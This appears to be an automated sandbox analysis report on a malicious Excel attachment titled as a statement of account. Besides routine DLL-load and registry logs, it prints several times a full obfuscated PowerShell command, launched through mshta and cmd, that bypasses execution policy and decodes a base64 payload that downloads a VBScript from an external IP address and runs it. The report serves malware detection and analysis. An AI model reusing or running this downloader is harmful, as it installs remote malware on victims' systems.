Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: SOA USD67,353.35.xla.xlsx

Static file information: File size 1062400 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.pdbhP source: powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.pdb source: powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .pdbo source: powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp

Source: ~DF090E1EE033FA1134.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: SOA USD67,353.35.xla.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
